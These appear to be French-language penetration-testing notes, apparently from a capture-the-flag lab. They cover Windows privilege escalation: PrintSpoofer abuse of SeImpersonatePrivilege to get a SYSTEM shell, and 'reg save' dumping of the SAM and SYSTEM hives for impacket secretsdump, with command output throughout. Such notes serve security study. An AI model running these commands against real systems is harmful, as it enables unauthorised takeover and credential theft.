Default
Privilege Escalation
SeImpersonatePrivilege Pour ca j’utilise
PrintSpoofer.exe
- https://juggernaut-sec.com/seimpersonateprivilege/
- https://www.hackingarticles.in/windows-privilege-escalation-seimpersonateprivilege/
class="highlight">
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
$ *Evil-WinRM* PS C:\temp> .\PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.20348.3453]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>
$ *Evil-WinRM* PS C:\temp> dir
Directory: C:\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/6/2025 3:07 AM 27136 PrintSpoofer.exe
-a---- 6/6/2025 3:07 AM 7168 shell.exe
.*Evil-WinRM* PS C:\temp> .\PrintSpoofer.exe -i -c "c:\temp\shell.exe"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
SeBackupPrivilege/SeRestorePrivilege Quand on a ces deux privilege la: on peux utiliser deja le : SeRestoreAbuse de xct deja disponible en .exe pour exploiter le SeRestorePrivilege
class="highlight">1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>
et maintenant si c’est le SeBackupPrivilege
alors j’utilise reg save
pour enregister les ntds
:
class="highlight">1
2
3
4
5
$ *Evil-WinRM* PS C:\temo> reg save hklm\system c:\temo\system.hive
The operation completed successfully.
*Evil-WinRM* PS C:\temo> reg save hklm\sam c:\temo\sam.hive
The operation completed successfully.
*Evil-WinRM* PS C:\temo>
Ensuite transfere en local pour lire les fichiers importantes avec secretsdump
de impacket
Transfert